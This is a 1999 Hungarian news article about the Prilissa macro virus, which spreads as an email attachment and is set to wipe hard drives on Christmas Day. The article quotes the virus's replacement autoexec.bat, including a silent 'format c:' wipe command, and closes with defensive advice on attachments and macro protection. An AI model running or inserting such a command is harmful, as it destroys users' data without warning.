Karácsonyi ajándék Prilissától

, 1999. november 22. 14:34
Két korábbi vírus, a PRI és a Melissa kereszteződéséből született a legújabb veszélyforrás, a Prilissa, amely amellett, hogy megtartja elődjeinek minden "jó tulajdonságát", ráadásként karácsonykor még meg is formázza a megfertőzött gép merevlemezét.
A Melissától örökölte a most terjedő vírus azt a tulajdonságát, hogy "egy nagyon fontos dokumentum" formájában attachmentként terjed, s ha véletlenül kinyitják, akkor 50 helyre automatikusan továbbítja magát. A PRI ehhez színes foltokat helyez el a felhasználó dokumentumaiban, s ehhez jön karácsony reggelén a meglepetés: minden eltűnik a merevlemezről. Az eltüntetést tulajdonképpen mi okozzuk a gép bekapcsolásával. A Prilissa csak az autoexec.bat rutint cseréli ki december 25. reggelén a következőre:

"@echo off"

"@echo Vine...Vide...Vice...Moslem Power Never End..."

"@echo Your Computer Have Just Been Terminated By = CyberNET = Virus !!!"

"ctty nul"

"format c: /autotest /q /u"

Mivel a Windows NT nem használja az AUTOEXEC.BAT-ot, ezért a Windows NT felhasználói ettől a hatástól védve maradnak. Viszont a Windows 95/98 felhasználóinál a következő bekapcsoláskor automatikusan megtörténik a formázás, és utána megjelenik a "jöttem-láttam-győztem" felirat, s a muszlim hatalom örökkévalóságába, az emberi éra végességébe vetett hit hangoztatása.

A legjobb védekezés továbbra is az, hogy még az ismerősöktől kapott levelek esetében sem nyitjuk ki automatikusan a mellékleteket, s ha várunk is valakitől ilyet, amikor megkapjuk, tisztázzuk telefonon, hogy ő volt-e a feladó, valóban tudatosan küldte, s bizonyos a dolog tisztaságában. Ezután se automatikusan nyissuk meg a mellékleteket, hanem a lemezről, mégpedig megnyitás előtt nézzük meg, hogy be van-e állítva a Wordben a makróvédelem, mert ez esetben a makróval ellátott fájlokra külön is figyelmeztet a szoftver. Ha olyan jelzést kapunk, hogy a fájlban makró van, bár az lehet ártatlan is, mindenképpen makró nélkül nyissuk meg a fájlt, így tartalmát ugyanúgy el tudjuk olvasni, s nem vagyunk akkora veszélynek kitéve...

Ha már megtörtént a baj, akkor természetesen a nagyobb vírusirtó szoftverházak termékeihez kell fordulnunk, amelyek természetesen gyorsan felkészülnek minden új jövevényre, csak hát mindezt kizárólag utólag tudják megtenni.